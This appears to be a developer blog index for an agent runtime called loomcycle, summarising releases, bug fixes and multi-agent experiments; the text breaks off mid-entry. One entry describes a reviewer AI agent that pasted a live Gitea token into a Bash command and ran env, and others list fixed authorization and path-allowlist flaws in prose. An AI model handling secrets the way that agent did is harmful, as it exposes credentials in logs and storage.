Post-v1.0 plans (3 named design RFCs): the context-compress plugin (RFC Z Phase 2, LLMLingua-style content compression in the contextplugin chain that shipsredactin v1.0); SQL Memory (RFC AA, per-scope SQL databases the runtime hosts for sandboxed agents - closes the Bash + sqlite3 gap); a capability-based memory interface with mem0 as the firstMemoryLayerbackend (RFC K, 57k ★, Apache-2.0, daily commits - the substrate stops pretending an LLM-extract product is a KV store). Companion projects (4): loomcycle, n8n-nodes-loomcycle (Slim + Full editions, 20 / 24 nodes), claude-code-plugin-loomcycle, and the Paca integration in flight. v1.0 is the first portable, durable, hardened version of the substrate. Everything from here is composition. -
133 minutes on a local Qwen, after four fixes
Cloud LLMs are wonderful when you have a credit card and a clean API. Local models are a different proposition. Two days of testing loomcycle on a slow Ollama model surfaced four real bugs in a row, plus a fifth after the first four landed. Bug 1 (v0.34.3): the compaction gauge lied for one turn -
lastCtxTokenswas only refreshed from a completed provider turn's usage, soContext op=selfkept reporting the pre-compaction footprint until the next turn finished. Fixed by refreshing at every compaction site + stamping the footprint below the compaction block. Bug 2 (v0.34.4 → v0.34.5): the Ollama context window was a lie in both directions.Capabilities().MaxContextTokenswas hard-coded as 0; the operator-pinnedLOOMCYCLE_OLLAMA_LOCAL_NUM_CTXwent out asoptions.num_ctx, capping the window AND reporting it - overriding whatever ollama had loaded.qwen3.6:27btrained for 256K, ollama loads it at 128K viaOLLAMA_CONTEXT_LENGTH, but loomcycle was forcing/reporting 32K. Fix reads the actual loaded context fromGET /api/psonce the model is in VRAM (ollama publishescontext_lengthonly after load); cached per-model, 5-min TTL, 2s probe timeout, gauge-only - never correctness. Bug 3 (v0.34.4): cloud-shaped 60s time-to-first-byte killed cold local models on disk-load + prefill. Fix:ollama-localregistration gets its own timeout pair, default 300s/300s, configurable via env. Cloud Ollama keeps cloud defaults. Bug 4 (PR #503, v0.37.0): the deep one. Acode-reviewerrun's auto-compact "succeeded" but the kept-verbatim tail (20 turns × 5-50KBReadtool results) was 153.8k tokens - still over the 131k window. Compaction folded older history into a 20.4k summary but the tail was bigger than what fit. Next prefill blew the window; run died. Fix: when the provider reports a window, advance the cut forward, folding the OLDEST kept-verbatim turns into the summarized span until the kept tail fits ~half the window. Single irreducible over-budget turn is kept, not dropped to empty; estimate-based budget errs toward keeping LESS (safe direction for slow local prefill cost). Bug 5 (PR #502, v0.37.0): even with the tail-cap, a single iteration could block ~10 min on a slow model call - and the stale-run sweeper reaped the LIVE run asheartbeat_timeout.OnHeartbeatfired only at iteration START; long prefills exceeded the threshold with no pulse. Fix: a 30s run-lifetime heartbeat ticker that pulses for as long as the run goroutine is alive, in ADDITION to per-iteration. The final run: 133 minutes on Qwen3.6:27b throughollama-local, multiple auto-compactions firing correctly, tail-cap keeping every post-compaction request under the 131k window, heartbeat ticker keeping the run alive through every long prefill, gauge reporting honestused_pctafter each compaction. No reaper, no failed prefill, no stale gauge. The agent finished its task. Six minor releases shipped in two days: v0.34.3 / v0.34.4 / v0.34.5 / v0.35.0 (model aliases in tier candidates) / v0.36.0 (sandbox introspection) / v0.37.0. Each fix small (a goroutine, a 2s probe, a re-stamp); none touch the wire shape. Plus a newdocs/CONFIGURATION.md §6bwith the slow-local-model recipe and a focusedloomcycle.local-interactive.example.yamlfor steering interactive agents on local models. -
Claude Code orchestrates, loomcycle executes - a real 10-agent code review through MCP fan-out (exp7, v0.33.0)
Day seven of the operator-via-MCP series - and the cleanest demonstration yet of the architectural shape loomcycle has been driving toward. Claude Code stays the operator and the conversation surface. loomcycle is the side runtime where the actual multi-agent work runs. Topology: a fresh Claude Code session in the jail git-clones loomcycle, then - using its own
.claude/agents/code-reviewer.mdand.claude/skills/code-review/SKILL.mdas the seed - synthesizes a reviewer agent and a code-review skill for loomcycle. Oneloomcycle import claude-code --from=work/exp7/.claude --write --skills-dest=$PWD/skillslater (the RFC C2 importer that maps the.claude/shape onto loomcycle's content-addressed Defs - AgentDef + SkillDef), the operator makes one MCP call:spawn_runs(N=10, mode=join)(RFC Y, #464, v0.33.0, shipped today) - fanning 10 reviewers across 10 repo slices (internal/api/http,internal/tools/builtin,internal/providers,internal/store,internal/config,internal/snapshot,internal/scheduler,internal/pause,internal/channels,cmd/loomcycle). The reviewers run concurrently inside loomcycle, each parking findings in the Memory tool underuserscope as a shared ledger. One morespawn_runwakes a consolidator that reads the ledger, merges 10 slices into one report, and returns. Result: 10/10 slices, 86 files, 35 issues - 1 Critical + 34 Important. The Critical:internal/channels/scheduler.go:81, atime.AfterFuncclosure that can fire before the outerLoadOrStorecommits → permanentpendCntleak under sub-millisecond timer drift. Same-day fixes shipped: #462 + #463 resolved the Critical and most of the Important findings within hours. The Important set surfaced seven structural patterns worth naming: annewID()panic on collision (no retry), aToolCtxgoroutine leak when the call exceeds context, a restored paused-runs status mismatch, a memory-quota check-then-write race, aMaxBytesReaderOOM vector via inflatedContent-Length, an interactive-goroutine semaphore leak on early return, and aRefresher.Stop()deadlock when the producer holds the same mutex. Three runtime findings surfaced by exp7 itself: Glob abs-path matching falls back to substring on relative roots (matches files outside the allowlist); cross-provider fallback dropsreasoning_contentwhen the secondary provider doesn't speak the same field;spawn_runswith N=10 against a single Anthropic-OAuth subscription tripped the per-key rate limit, surfacing the need for an operator-level fan-out throttle. The substrate-shaped path means the 10 reviewers run as real loomcycle agents, with scheduler reach, memory durability, OTEL spans, and per-run credential isolation, while Claude Code stays the human-facing operator. The contract between the two systems is the MCP wire surface - narrow, structured, well-defined. -
Context compaction for long-running agents - manual, auto, and the agent asking for it itself (v0.32.0)
Yesterday's interactive terminal made it possible to drive a loomcycle agent for hours from the browser. The natural next problem: a multi-hour conversation eventually crowds the model's context window. v0.32.0 ships a context-compaction subsystem with three coordinated triggers around one shared summarizer. Manual: a Compact button in the run terminal header that calls
POST /v1/runs/{run_id}/compact- gated to a safe boundary (a live interactive run must be parked atawaiting_input; mid-turn returns 409, same iteration-boundary discipline as F41 cooperative pause and the steering work'sdrainSteer). Auto: at the top of each iteration, when the prompt footprint crosses a per-agentautocompact_at_pctthreshold (50..95, off by default), the loop summarizes inline and replaces - debounced by a +1-iteration guard, skipped when the window is unknown (Ollama). Self: a newContext op=compacttool that an agent can call itself, looking at its own context usage via the augmentedContext op=self, which now reports acontextobject -{used_tokens, max_tokens, used_pct}alongside the resolvedcompactionsettings - so an agent's prompt can include "ifcontext.used_pct ≥ compaction.autocompact_at_pct→ callop=compactnow." The compacted form is pinned task + summary + last-N, not brutal drop-everything: aCompactionSplithelper snaps the cut to a clean user-turn boundary so atool_use/tool_resultspair is never split. Per-agent settings (enabled,target_percentage10..50,keep_last_n,keep_first,autocompact_at_pct50..95,model- a cheaper summary model) round-trip through every AgentDef mirror, content-identifying. The asymmetric design choice: compaction settings flow DOWN the spawn tree (unlike memory/sampling which are each agent's own) - a parent that needs aggressive compaction wants its fan-out children compacted too. Precedence: per-spawn override onAgent.spawn> parent's effective policy > child def's own settings, recursive across grandchildren. Durable: persistedEventContextCompactionmarker meansreplayTranscriptrebuilds the compacted form on crash-recovery / resume / continuation; OTEL adds acontext.compactionspan event. Plus bundled UI polish: a "✕ Stop" button restyled white-on-dark-red so the destructive cancel reads at a glance, and a Claude-Desktop-style composer card for the terminal input. The substrate now manages context-window pressure as a first-class concern, with the agent able to participate in the decision rather than just bumping into the wall. -
An interactive terminal in the Web UI - steer your agents mid-run, Claude-Code-style (v0.26 → v0.29)
Open the Web UI, navigate to
/run, pick an agent, type a prompt. The agent streams back into a terminal. You can type a new instruction while it's still working and it shows up as the next user turn before the model's next call. You can answer its Yes/No questions inline. You can close the page, come back two hours later, and the run is still alive. The substrate becomes a development surface. Four headline mechanisms shipped at v0.26.0: (1) Mid-run steering -POST /v1/runs/{run_id}/input+ a newinternal/steerper-run registry (depth-16 buffered channel mirroring the cancel registry), with adrainSteerhook that pulls queued messages at the top of each iteration - never between atool_useassistant turn and itstool_results(that orphans the tool_use and 400s the provider). (2) Persistent interactive runs that park atend_turnemittingEventAwaitingInputinstead of terminating; paired with per-agentunbounded_iterations(lifts the 16-iteration soft-cap for LLM agents; keeps the 1<<20 hard ceiling as a runaway backstop; cancel becomes the stop). (3) Inline interruption answers - the agent'sInterruption.askbecomes an inline prompt instead of bouncing the operator to a separate inbox. (4) The terminal itself - always-on prompt that routes by state (steer while running, continue between turns). v0.26.1 added cross-replica steering (aSteerCoordinatormirroring the cancel coordinator's shape). v0.27.0 made interactive runs survive a view-switch - the loop now runs undercontext.WithoutCancel(r.Context())(keeps auth principal + tenant but drops cancel-on-disconnect), persists to the store, and a newGET /v1/runs/{id}/streamendpoint replays from?from_seqthen live-tails. v0.29.0 (today) polishes the terminal: user-message echo (the operator's prompt is finally visible in the live transcript - was being filtered out as a persisted event); a context-size gauge in the header (47.2k / 200k tokens, amber > 70%, red > 90%) computing the true prompt footprint asinput + cache_read + cache_creationtokens; agent editor sampling controls (temperature, top_p, top_k, frequency_penalty, presence_penalty, seed, stop) + advanced JSON/YAML overlay box; soft-reclaim of retired agent names;Context op=selfreports the resolved provider + model (per-iteration so mid-run fallback shows truthfully). The substrate becomes a development surface, not just a production runtime - and codifies the "parked run, woken by external event" contract that self-evolving agents (exp6.5) and agent ensembles (exp5) both build on. -
Self-evolving agents - genes that drive real temperature, an experiment that snapshots mid-run and resumes on another instance, and a local-model rerun that names the model-class wall (exp6 + exp6.5 + exp6.8, v0.25 → v0.37)
A genetic algorithm over forkable
AgentDefs, run in three iterations across loomcycle's substrate. exp6 (static v0.25.2 + fully-dynamic v0.26.2, the F40 fix that let a runtime-authored meta-agent fork) was prompt-only evolution: three integer genes (creativity, courage, caution) baked as literal text into each solver'ssystem_promptand inherited viaAgentDef.fork+parent_def_idlineage. exp6.5 closes the experiment cleanly across v0.28.0 → v0.30.0, with all three previously-open gaps now fixed. (1) Per-agent model tunings (#447, v0.28.0) makeAgentDef.samplinga real fork-overlay field - the creativity gene now setssampling.temperature = round(creativity/10, 2), so a gene mutation actually changes the model's sampling, not just prompt text. Real evolution, not pretend. (2) F41 fixed (#446, v0.28.0, RFC X Phase 1): cooperative pause now parks in-flight sub-runs at iteration boundaries and gates newPOST /v1/runswith HTTP 503 during the quiesce window. (3) F42 fixed (#456, v0.30.0, RFC X Phase 2): cross-instance resume of snapshotted mid-runs.ResumePausedRunsreconstructs a paused run's loop from its restored transcript and re-entersloop.Rununder the same run_id. The killer demo: pause the breeder mid-MUTATE (gen 2 half-seeded, 91 transcript events captured as apaused_runsrow), wipe the DB, restore on a fresh loomcycle instance - and the re-dispatched breeder finishes its work autonomously with no external driver, seeding the remaining variants from where it was parked. The experiment continues to completion: 5 generations, mean climbing 0.763 → 0.865, winner atbest_score: 0.91withsampling.temperature: 0.8(the temperature gene survived the mid-run restore). Cross-instance lineage proven across the mid-run boundary: a gen-2 variant forged on the fresh instance by the re-dispatched breeder hasparent_def_id= a gen-1 def that existed only in the file. Pause/snapshot truly anytime. The first experiment in the series that needed no new substrate primitives - and now the first portable experiment artifact that survives a mid-run boundary, a DB wipe, and resumes autonomously on a clean machine. Extended 2026-06-16 with exp6.8: the same GA rerun on a localgemma4:maxsolver population with cloud-sonnet meta-agents (breeder + advisor). The substrate works flawlessly across 5 generations - per-agentsampling.temperaturereaches ollama on every fork,Agent.parallel_spawndispatches cleanly, the v0.37 robustness (heartbeat ticker + compaction tail-cap + 300s local timeouts) keeps the long slow run alive. A local model as breeder does NOT work (qwen3.6:maxmis-formatted the parallel_spawn argument as a JSON string and terminated its turn early; 80-step orchestration is beyond a local small model's structured-tool-call reliability). Honest finding: the GA completes but the population mean stays flat - ~35% of variant-slots produce no usable score becausegemma4:maxsilently skips the structured self-report ~20% of the time and hallucinates ~15%. The winner is real; the population is not converging because most of the population isn't reporting. The substrate is the constant; the small-model reliability ceiling is the variable. exp6.8 is the experiment that surfaces the model-class wall honestly, with the loomcycle substrate as the measuring instrument. -
Agent ensembles arrive - scheduler-driven fan-out,
Channel.awaitfan-in, and a clock for agents (RFC S, v0.25)Experiment 5 in the operator-via-MCP series - and the first one to own the term agent ensemble. A scheduler-driven news-digest pipeline runs as a real ensemble: 5 RSS collectors (HN, Wired, Engadget, Ars Technica, TechCrunch) fire in parallel by cron, each pings a fan-in channel via the scheduler's
on_completehook, a consolidator scheduled 1 minute later calls the newChannel.await {channels, mode: at_least, n: 5, wait_ms: 120s}combinator to wait for all five (or a clean timeout), URL-dedup across 25 items, single Telegram digest as output. End-to-end on both static and fully-dynamic variants (every entity created at runtime via REST) with zero workarounds. The v0.25 "agentic-ensemble" release ships RFC S - three primitives the substrate had been missing:Context op=time(closes F34 - agents finally have a clock; no more shelling toBash datefor cycle bucketing),Channel.awaitwith a symmetricChannel.broadcastfan-out (closes F35 - the missing fan-in combinator across N channels, with any/all/at_least_n modes andwait_msbound), and schedulemax_fires(closes F36 - a schedule self-retires after N fires, no external watcher needed). Three follow-up fixes each surfaced by exp5 itself, all shipped within 24 hours: #422 F37 (scheduleron_completepublish honors channel's declared scope - fan-in channels can be properlyscope: globalagain), #424 F38 (scheduled runs resolve agent in def's tenant - unblocks the fully-dynamic ensemble), #426 F39 (dynamic stdio MCP env interpolation - unblocks the runtime-registered Telegram MCP). Companion change: every prior experiment (exp1-exp4) now ships as a self-contained directory under loomcycle/examples - each carries its ownloomcycle.yaml,run.sh,.env.local.exampletemplate, and reproducible README; Anthropic-OAuth-primary with a DeepSeek fallback. The substrate is now ensemble-shaped, not just agent-shaped. -
The day the reviewer agent inlined the Gitea token in a Bash command - and v0.23.4 redacted it anyway
Day four of the operator-via-MCP experiment series. Real Gitea on the tailnet, real third-party MCP (gitea-mcp, 53 tools), real Telegram bot. The closed-loop dev workflow runs end-to-end un-bridged: the coder agent opens a real PR, a Gitea
pull_requestwebhook auto-spawns the reviewer with the full signed payload, the reviewer merges, a second webhook spawns the advisor, Telegram lights up. Every entity created at runtime by v0.23.5 - no static yaml. The headline moment came mid-merge: the reviewer agent inlined the resolvedGITEA_TOKENliterally in a Bash command and then ranenvfor good measure. The token is now in two distinct tool-call records. Pre-v0.23.4 = persisted plaintext in SQLite. v0.23.4 (#407) ships value-based redaction at rest: the runtime matches the resolved secret string against persistence-bound payloads and replaces every occurrence with[redacted:<env-var-name>], preserving the env-var name for debuggability. Whole-DB scan after the run: 0 literal token hits, 0 webhook-secret hits, 32 env-var-name references. The redaction is value-based - so an agent assigning the token to a differently-named shell var (GITEA_TOKEN=...instead ofLOOMCYCLE_GITEA_TOKEN) is caught anyway. Plus three supporting fixes that made the fully-dynamic version of this workflow possible: #403 webhook → dynamic agent via tenant stamping, #405 gated dynamic stdio MCP with token-safe env mapping, #409 dynamic MCP tools advertised at run start. Store names, never values - and enforce it value-based so the agent's typo doesn't undo your discipline. -
Multi-agent refine loop, 0.92 → 0.98 in 5 hops - and the silent default-deny that almost made it look like the agents weren't talking
Day three of the operator-via-MCP series. Three agents iterating "What is recursion?" over Channels + Memory + Evaluation - answerer, evaluator, aggregator. Five hops, scores climbed 0.92 → 0.98, winner: "A mirror facing a mirror - each reflection a smaller twin of the last, until there's nothing left to reflect." The convergence is satisfying; the interesting part is everything we had to fix to make the loop run cleanly. Five bugs the runtime should have warned about at boot: (1) F21 - every Memory op was silently refused because agents lacked
memory_scopes; default-deny was correct, default-silent-deny was a footgun - #389 boot-warns the family (Memory/Evaluation/Channel/Interruption). (2) F18 -spawn_run user_idwas being silently overridden to"default"under the legacyLOOMCYCLE_AUTH_TOKENpath because RFC L'sapplyPrincipalminted a fixed placeholder principal; #388 honors wireuser_idfor legacy principals while keeping the strict override for realOperatorTokenDefprincipals. (3) F20 -channeldefCRUD lived only in REST; #395 adds the meta-tool withcreate/delete/purgeacross MCP/gRPC/TS. (4) F22 -Channel.subscribe wait_mswas silently capped; #390 warns on truncation. (5) F29 - runtime-substrate channels weren't usable for pub/sub because the per-run policy only saw yaml channels; #404 merges the runtime channel store into the policy. The fully-dynamic re-run on v0.23.3 (all three agents and three channels created at runtime, zero yaml) completes the loop cleanly. Default-deny is right. Default-silent-deny is a footgun. -
The MCP server wedged the IDE on a list - head-of-line blocking, and why killing the process was the only release (RFC O/P/R)
Day two of the operator-via-MCP series. Mid-experiment, the operator's IDE (Claude Code over the loomcycle plugin's stdio MCP) hung on a
list_runstool confirmation. They approved the call. Nothing happened. Killing theloomcycle mcpprocess from another terminal was the only release. Why does a cheap list hang for tens of minutes? Source-reading v0.22.0'sinternal/api/mcp/server.gofound a single load-bearing footnote: "Frames are dispatched SEQUENTIALLY... Concurrent tools/call is a v0.9.x optimisation" - not implemented. Combined with an unboundedspawn_runhandler (no per-call timeout), one slow run blocked every subsequent frame, even cheap reads, evencancel_run. Classic head-of-line blocking on a single-consumer stream. Three amplifiers turned "slow" into "wedged for an hour": F15 cross-runtime interruption wake (the run held for the 1h interruption timeout), provider outage stalls (Opus 4.7/4.8 incident the same day), and accumulated SSE/resource pressure. Three coordinated fixes in v0.23.0 close the failure class at three levels: RFC O (#377) makes stdio dispatch concurrent on bounded goroutines; RFC P (#380) wrapsspawn_runin a transport timeout; RFC R (#381) ships the thin-client topology (loomcycle mcp --upstream <runtime>) that dissolves the cross-process coordination problem entirely. Breaking change in the same release:loomcycle mcp --no-httpremoved - the pattern that needed it caused F15. A "we'll fix it later" comment on a load-bearing concurrency property is a P1 bug, not a roadmap item. -
We drove a fresh Claude Code session as the operator - and the first experiment found a DeepSeek bug we'd shipped without noticing
Day one of a four-experiment series. To pressure-test loomcycle from the outside, we set up an isolated sandbox, installed the brew binary, and drove it through a fresh Claude Code session as the operator - talking to loomcycle over MCP, with no internal shortcuts. Every experiment designed in advance by us; every step executed by Claude through the same tool surface a community operator would see. The smallest test first: can a coding agent actually use the built-in tools the operator enabled? Yes - but the first run died at
Bash{mkdir -p exp1}.mkdirreturns empty stdout. Loomcycle's openai-compat adapter was droppingcontenton tool-result messages when the content was empty, and DeepSeek's API requires it (every other provider tolerated the omission). 400 mid-conversation, loop dead. F10 - fixed in v0.23.0 (#379, RFC Q): always serializecontenton tool messages. Run 2 passed cleanly - independent verification confirmed exactly the first 100 primes, 0 mismatches, first/last 2/541. Plus the second experiment (Interruption Yes/No gating, PASS) surfaced F15 - cross-runtime interruption wake fails silently because the bus is in-process. v0.23.0's thin-client topology (RFC R) dissolves the cross-process pattern that triggered it. Provider-adapter correctness is load-bearing in a way unit tests miss - every other provider tolerated the missing field, so the bug had been invisible against Anthropic / OpenAI / Gemini. -
Collapsing four hallucinating LLM orchestrators into zero tokens - and the two bugs the migration found
JobEmber.ai's agentic pipeline had four batch orchestrators - each one taking some list of N items, fanning out N LLM worker agents in parallel, optionally reducing the workers' outputs. The orchestration work was deterministic. Partition a list. Chunk a slice. Wrap each item in a worker prompt. Spawn N children. Collect results. Yet one of them -
job-search-batch- was running as an LLM agent burning ~8,000 tokens per run, and the weak-tier model occasionally hallucinated its own routing logic and serialized the workers it was supposed to fan out (violating the "FIRE ALL N SPAWNS IN ONE ITERATION" system-prompt instruction). v0.20.0's inlinecode_bodyingestion made the right fix viable: replace all four with deterministic code-js agents. Zero tokens for the orchestration layer. No hallucination. One run-id to monitor + cancel as a unit (vs N orphan promises from a TS Promise.allSettled). Scheduler-fireable. The migration surfaced two latent loomcycle bugs the LLM-orchestrator path had been hiding - both shipped in v0.21.0. (1) The code-js wall-clock budget was 120 seconds, CPU-sized for a JS body that runs to completion, but a fan-out orchestrator parks for minutes inAgent.parallel_spawnwaiting for LLM children; resume turns started over-budget and the runtime interrupted the next interruptible bytecode, surfacing ascode_agent_threwat an innocent source line (loomcycle #359). Fix: distinctcode_agent_timeouterror class + per-agentrun_timeout_seconds+ per-run override. (2) The Gomap[string]any→ JS object conversion (rt.ToValue) walked the map in Go's deliberately-randomized iteration order, so the sameinput.metadataproduced JS objects with different key order on each replay turn. An agent that doesJSON.stringify(input.metadata.matches)emitted byte-different bytes turn-1 vs replay → spuriouscode_agent_replay_divergence(loomcycle #366). Fix:stableJSValue()recursively materializes every map as a JS object with sorted keys. Note:LOOMCYCLE_CODE_AGENTS_DETERMINISTIC=1pins only RNG seed + clock anchor - it did not fix this. The pattern worth taking forward: if a step in your agentic pipeline can be expressed as a 30-line deterministic function, it should not be an LLM agent. -
Code agents without a host filesystem - JS bodies through the substrate (v0.19.0 + v0.20.0)
Code-as-agent (RFC J, v0.16.0) shipped JS bodies as
agent_code/<name>/index.json the loomcycle sidecar's disk. That host-FS dependency was fine for local dev and a single VPS - but it didn't survive three deployment shapes operators were already running: cloud (no host filesystem to bind), container orchestration (bind-mounting kills "docker pull && run" portability), and n8n interactive (workflow authors define agents at design time and never touch the sidecar's disk). v0.19.0 (#349 + follow-up #350) threads inlinecode_bodythroughAgentDefas a hash-significant content field - versioned, content-addressed, snapshot-portable, gated by the existingLOOMCYCLE_CODE_AGENTS_ENABLEDswitch with a 256 KB cap. Empty bodyomitempty's out of canonicalization, so every existing non-code agent hashes byte-for-byte identical - zero upgrade churn. Plus three review-fixes worth naming: boot-fatal validation now accepts inline bodies (the headline no-FS-bind case had been failinglog.Fatalf), per-turn disk read regression closed on the FS path (a replay-N-turns code-agent had been re-reading + re-hashingindex.json every Provider.Call), and a three-way hash drift between substrate / .md-discovery /loomcycle hash agentCLI was resolved - oncecode_bodybecame hash-significant, three producers had three different definitions of "content," and operatorverifywould silently disagree withcreate. v0.20.0 lights up the Web UI (#351 - Library renderscode_bodyas a monospace block; create/fork modal grows a code textarea forprovider:code-js), ships the typedensureCodeAgent+ 0.20.0ensureMcpServer.discoveredToolCountsugar (#353), and closes a sibling MCPServerDef asymmetry: #352 foldstools/listintocreateat ingestion (no v2, no separate manualrediscover; best-effort, promote-gated, size-guarded). Same static-vs-dynamic asymmetry class as yesterday's post - this round closes it on the code-agent side. -
We inverted a startup race - and found four static-vs-dynamic asymmetries to close
A live failure on 2026-06-02 in JobEmber.ai's cv/cl-adapter agent traced back to a static
mcp_servers.jobs:block inloomcycle.yamlthat created a chicken-or-egg between the loomcycle sidecar and the MCP-providing web service. The fix direction was obvious - invert the dependency, let the MCP-providing service register its ownMCPServerDefdynamically when it's already live. The fix itself surfaced four distinct static-vs-dynamic asymmetries the substrate had silently been hiding because every previous consumer stuck to the static path. (1)createonly checked the public host allowlist, not the private one (#340). (2) The lazy tool resolver consulted only the static yaml map - dynamic tools were callable via the pool but not resolvable at dispatch (#341); the fix consolidated through the sharedlookup.MCPServerorphan-with-zero-callers (#345). (3) Every consumer restart minted a new MCPServerDef version (one lineage hit 19 in days); SHA-dedup landed server-side + typedensureMcpServersugar in TS client 0.18.0 (#343 + #344). (4) The most subtle:${LOOMCYCLE_*}inside a header was flattened atconfig.Loadon the yaml path; the dynamic path bypassedconfig.Loadentirely, the request-time substituter's lazy.*?fallback regex truncated on the inner}, and loomcycle sent literalBearer ${LOOMCYCLE_…}upstream - hard 401 (#348). Plus two bonus close-outs on the same asymmetry class: dynamic tools now advertise in the per-run catalog (#347), static yaml schedules now bootstrap into the sweeper's due-query (#346). The discipline going forward: when a substrate primitive has both a yaml-loaded and a dynamically-created path, every seam between substrate and runtime must work the same on both - or the side nobody exercises silently rots. -
Multi-tenant authorization shipped - and the four bugs adversarial QA caught before v0.17.0
v0.17.0 ships RFC L: the seventh substrate primitive (
OperatorTokenDef), an authoritative{tenant_id, subject, scopes}principal resolved from the bearer instead of the wire, per-route + per-RPC scope enforcement, a tenant-scoped read boundary across the API and Web UI, and a role-aware workspace with super-admin tenant focus. The feature shipped clean across three PRs (substrate + identity threading + token cache). Then adversarial QA went looking - and found four authorization gaps the feature PRs missed. One CRITICAL: the gRPC interceptor authenticated but never scope-checked, so any narrow token could mintsubstrate:admintokens. Three HIGH: cross-principal session continuation trusted session-id-as-secret, retiring the last admin silently dropped into open-mode (fail-OPEN), and the per-route scope map had typos that left mutating routes ungated. All four closed with regression-grade tests before tag. The lesson worth keeping: authentication is the easy half; authorization needs a second pass. v1.0 reframes from "RFC L is the v1.0 capstone" to a pure hardening + distribution milestone. -
n8n Cloud's scanner - and why @loomcycle/n8n-nodes-loomcycle now ships in two editions
v3.0.0 of
@loomcycle/n8n-nodes-loomcyclesplits into Slim (14 nodes, zero runtime dependencies, n8n-Cloud-verified) and Full (18 nodes, self-hosted only, includes the AI-Agent Tool cluster sub-nodes plus SSE triggers plus the Wait-for-Completion op). The forcing function was n8n Cloud's@n8n/scan-community-packagescanner: bans@langchain/core, every timer primitive (setTimeout/setInterval/node:timers/globalThis/process),console, and non-(n8n-workflow) peer deps. Our value-add cluster sub-nodes (Memory Tool, Channel Tool, Sub-Agent Tool, MCP Server Tool) were built on langchain's tool-supply API - no path to a single package that kept them and passed the scanner. The engineering punchline: the LoomCycle Chat Model migrated off@langchain/coreto@n8n/ai-node-sdk, deleting the BindTools / RunnableBinding / synthetic-tool-call-id workarounds the previous post documented. ~200 lines of compensation code, gone. Scanner constraints are constraints with intent. -
Code as agent - and the design we replaced before shipping
v0.16 shipped RFC J:
provider: code-jsruns operator-authored JavaScript via goja as a first-class agent. Same loop, OTEL spans, scheduler / webhook / A2A reachability, sub-agent composition - at zero token cost. The engineering core of the release is that we built it twice. The first design (PR #306 - parked-goroutine continuations with state held acrossProvider.Callinvocations) worked, integration-tested clean, and had three honest concerns that wouldn't go away: it held state where every other provider was stateless, depended on a goja issue for cancel semantics, and wasn't resumable across restart. PR #307 superseded it with the stateless replay model. EachCallbuilds a fresh goja runtime, fast-forwards through the run's transcript (which IS the durable memoization log), stops at the first un-recorded tool call. The transcript already exists; no parallel state machine; resumable across restart and replica for free. Ambient determinism (per-run-seededMath.random, anchoredDate.now) makes replay divergence-free by construction. Suspend/resume becomes symmetric because nothing is held across the loop's dispatch gap. -
Two memory interfaces - flat KV and the layered paradigm honest about its shape
v0.15 shipped a flat memory
Backendinterface with native ranking, search-time dedup, and Mem9 as the first external implementation. v0.16 shipsMemoryLayeralongside it - a separate optional capability for LLM-extract memory products like mem0, Zep, and Mem9 smart-mode. The forcing function was the RFC K product survey: every mature memory product turned out to be paradigm-mismatched against the flat-KV contract. Mem9's livev1alpha2API refuted our stub-tested wire shape point by point (write takesmessagesnot a caller key; server-assigned UUID identity;202 Acceptedasync ingest; noStats). The fix wasn't swapping Mem9 for mem0 - every LLM-extract product hits the same paradigm trap. Two interfaces is the honest answer; Mem9 demoted to PREVIEW and re-targeted atMemoryLayer, which is its actual paradigm. Interfaces lie when they advertise more than they support. -
Input webhooks - the signed-by-default front door for external events
RFC H shipped in v0.14.1.
WebhookDefis the fifth substrate primitive after AgentDef / SkillDef / MCPServerDef / ScheduleDef - external systems (GitHub, Stripe, Linear, n8n) sign and POST an event to/v1/_webhooks/{name}, and loomcycle either spawns an agent run (delivery: spawn) or wakes a parked agent through a channel (delivery: channel). HMAC-SHA256 over the raw body with three envelopes auto-detected, two-layer idempotency (in-memory cache + durableruns.idempotency_key), strict JSONPath payload projection, never-silently-degrade error contract. The engineering core of the release is two trust-boundary bugs the whole-feature review caught: a dedup cache that recordeddelivery_idat the guard step (silently dropping legitimate sender retries as replays) and a mapped payload field markedtrusted-textinstead ofuntrusted-block(bypassing the loop's prompt-injection fence). Both would have been silent in production; both got regression-grade tests on the fix. -
Loomcycle speaks A2A - server, client, and the INPUT_REQUIRED bridge that wasn't supposed to ship
RFC G shipped this week. Loomcycle now speaks the Agent2Agent protocol on both sides: a served AgentCard at
/.well-known/agent-card.json, three protocol bindings (REST, JSON-RPC, gRPC on loomcycle's existing gRPC server), signed cards over RFC 8785 JSON canonicalization, multi-tenant routing in three modes, and synthetica2a__<peer>__<skill>tools that let loomcycle agents call external A2A peers. The most interesting engineering moment: the locked RFC's Decision 9 deferredTASK_STATE_INPUT_REQUIREDto v2 - implementation revealed our existing Interruption tool already was the human-in-the-loop primitive A2A needed, so we shipped the bridge instead of the deferral. Plus the bug story that pays for end-to-end integration tests: a parked-run lifetime defect from the SDK's per-request context cancel, caught by the whole-feature code review against the reala2a-go v2.3.1server API, fixed withcontext.WithoutCancel+ executor-owned cancel. -
From Go-bundled to JSON-pluggable - and into Claude Code itself
A week ago, adding a new MCP server to loomcycle's catalog meant a Go PR, a recompile, and a binary release. Today it means dropping a JSON file in
$LOOMCYCLE_MCP_RECIPES_ROOT. The catalog moved from code to data - and because we chose Claude Code's.mcp.jsonper-server JSON shape as the format, two further moves became obvious:loomcycle import claude-codewalks a Claude Code repo's.claude/tree and ingests it into loomcycle yaml (recipe-match by package, preserves operator names, default-deny substrate-field stubs), and today's release of claude-code-plugin-loomcycle closes the loop with six slash commands, four bundled skills, and two opt-in hooks - zero loomcycle-side code changes. From now on, loomcycle is usable end-to-end inside Claude Code as the agentic runtime. -
Seven frameworks and the row that's missing
The 2026 agent-framework surveys (DSPy, Claude Agent SDK, OpenAI Agents SDK, CrewAI, Microsoft Agent Framework, LangGraph, Google ADK) rank seven contenders along durable execution, observability, multi-tenancy, sandboxing, and provider lock-in. The taxonomy is useful but shares a structural assumption that none of them names: the agent runtime lives either inside your application's process or inside the vendor's cloud. Loomcycle is the third shape - a single Go binary in a sidecar, on your infrastructure, owning the loop. Once the runtime moves out of the application, half the framework-by-framework gaps the surveys keep finding stop being gaps; they become consequences of where the runtime lives. The eighth row of the matrix, written out honestly.
-
Scheduled runs at 30,000 fires - and the double-fire we caught at the ceiling
v0.12.7 ships the second half of yesterday's twin-RFC pair - RFC E, ScheduleDef as a substrate primitive. Cron in yaml, sweeper fires real
